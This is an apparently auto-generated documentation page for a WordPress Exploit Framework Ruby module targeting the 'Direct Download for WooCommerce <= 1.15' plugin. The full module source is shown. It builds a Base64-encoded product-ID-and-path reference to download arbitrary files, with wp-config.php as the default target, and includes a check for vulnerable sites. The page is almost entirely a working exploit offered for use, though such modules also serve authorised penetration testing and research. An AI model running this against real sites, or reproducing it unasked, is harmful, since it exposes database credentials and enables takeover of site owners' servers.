class Wpxf::Auxiliary::DirectDownloadForWoocommerceFileDownload
Public Class Methods
new()
click to toggle source
Calls superclass method
Wpxf::WordPress::FileDownload::new
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 6 def initialize super update_info( name: 'Direct Download for WooCommerce <= 1.15 File Download', author: [ 'Diego Celdran Morell', # Disclosure 'rastating' # WPXF module ], references: [ ['WPVDB', '8724'] ], date: 'Jan 17 2017' ) register_options([ IntegerOption.new( name: 'product_id', desc: 'A valid product ID that has direct download enabled', required: true ) ]) end
Public Instance Methods
check()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 30 def check url = normalize_uri(full_uri, 'direct-download', Utility::Text.rand_alpha(5)) res = execute_get_request(url: url) return :vulnerable if res && !validate_content(res.body) :unknown end
default_remote_file_path()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 41 def default_remote_file_path 'wp-config.php' end
download_ref()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 49 def download_ref Base64.strict_encode64("#{product_id}|#{remote_file}") end
downloader_url()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 53 def downloader_url normalize_uri(full_uri, 'direct-download', download_ref) end
product_id()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 37 def product_id normalized_option_value('product_id') end
validate_content(content)
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 57 def validate_content(content) content !~ /This product is not available for direct free download/ end
working_directory()
click to toggle source
# File lib/wpxf/modules/auxiliary/file_download/direct_download_for_woocommerce_file_download.rb, line 45 def working_directory 'the WordPress installation directory' end